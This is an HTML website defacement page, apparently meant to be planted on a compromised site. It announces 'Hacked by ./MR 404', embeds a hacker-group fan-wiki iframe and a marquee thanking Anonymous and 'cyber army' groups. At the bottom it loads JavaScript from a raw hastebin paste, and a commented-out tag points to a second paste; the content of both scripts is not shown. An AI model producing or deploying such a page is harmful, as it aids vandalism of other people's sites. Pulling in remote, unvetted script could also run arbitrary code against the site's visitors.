<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="https://www.wallpaperflare.com/static/993/480/1010/suits-artwork-round-gray-wallpaper.jpg" type="image/x-icon">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <title>Hacked by ./MR 404</title>
</head>
<body>
    <style>
        body{
            background-color: black;
            user-select: none;
        }
        marquee{
            color:green;
            font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            font-weight: normal;
            border: 1px dashed blue;
            font-size:30px;
        }
        span.slash{
            color:red;
            font-size:30px;
            font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            font-weight: normal;
        }
    </style>
    <center>
        <h1 style="color:white;font-size: 45px;text-shadow: 2px 2px grey">Hacked by ./MR 404</h1><br><br>
        <p style="color:yellow;font-size: 45px;text-shadow: 2px 2px grey"><span style="color:red;font-size:32px;">NO SYSTEM</span> IS SAVE</p> 
        <iframe height="500"width="800"src="https://watchdogs.fandom.com/wiki/DedSec" frameborder="0"></iframe>
        <br><br>
        <p style="color:white;margin-top: -20px;"class="description"> <a href="#"></p>
        <img class="rounded-circle"height="200"width="200"src="https://www.wallpaperflare.com/static/993/480/1010/suits-artwork-round-gray-wallpaper.jpg">
        <marquee direction="left"onmouseover="this.stop();"onmouseout="this.start();">Thanks to <span class="slash">./ANONYMOUS ./CYBER COPS ./CYBER SECURITY GROUPS ./CYBER ARMY ./MYFRIENDS</span></marquee>
    </center>
    <script type="text/javascript"src="https://www.toptal.com/developers/hastebin/raw/resiluwoso"></script>
    <!--<script type="text/javascript"src="https://www.toptal.com/developers/hastebin/raw/ifihatifip"></script>!-->
</body>
</html>
